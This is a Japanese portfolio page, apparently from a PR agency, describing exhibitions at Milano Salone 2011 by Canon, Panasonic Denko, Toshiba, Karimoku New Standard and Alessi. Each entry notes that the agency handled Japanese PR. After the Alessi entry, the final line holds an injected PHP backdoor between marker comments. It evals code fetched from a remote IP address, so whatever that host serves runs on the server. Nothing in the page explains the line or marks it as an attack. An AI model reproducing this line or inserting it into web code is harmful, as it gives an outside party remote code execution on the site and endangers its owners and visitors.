デイリープレス

Milano Salone 2011

Canon

NEOREAL WONDER キヤノンデジタルイメージングの世界
キヤノンの映像分野における総合力を背景に、トラフ建築設計事務所とWOWのコラボレーションによる、軽やかな素材感とライブ感を楽しめる映像空間を展開した。
日本国内向けのPRを担当。
Photo : Daisuke Ohki

パナソニック電工

(standard)3 PIANO – FORTE

イタリア人デザイナーのフェルッチョ・ラビアーニ氏を起用し、LED、有機ELなど次世代照明とセンサーを使ったインタラクティブな展示で空間における光の質を表現。パワーあふれる光から、かすかなやさしい光まで、かつての「piano-forte」のように LEDと有機ELが切り開く新次元の光を空間で表現した。
日本国内向けのPRを担当。
Photo:Nacasa & Partners

TOSHIBA

Luce Tempo Luogo <光・時・場>
クリエイションパートナーにパリを拠点に活動する建築事務所、DGT(ドレル・ゴットメ・タネ/アーキテクツ)を迎えアートインスタレーションを行った。会場は、壁だけが残る100年以上も前の建造物。場所の記憶を呼び覚まし“そこにしかない光”を表現しながら、来場者の記憶や未来への期待を刺激する空間を創出。その土地にある多様な文化、風土、空間のもつ意味を理解した上で、新しい技術から新しい価値を生みだそうとするフィロソフィーを伝えた。
日本国内向けのPRを担当

KARIMOKU NEW STANDARD

A DAY KARIMOKU NEW STANDARD × SHIN SUZUKI


「日常とは何であるか?」をテーマに、日々膨大な写真を撮ることをライフワークとするアーティスト、鈴木心氏を迎えてのエキシビション。オブジェとしての家具の展示を超えた、もっと生活の場面へと想像を拡げることができる新しい家具の提案への挑戦。
日本国内向けの他、海外のPR事務所とリレーションを組み、PRを行った。
Photo : Shin Suzuki

ALESSI

市内のフラッグストアを会場に、外部の機関や企業と開発しているプロジェクトを紹介。
デイビット・チッパーフィールドがデザインを手がけたALESSI CHAIRをはじめ、LED照明シリーズALESSI LUX、スイスの美術大学ECALの学生とのワークショップで学生達がデザインしたプロトタイプ展などを発表。
日本国内向けのPRを担当。
http://www.alessi.com

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>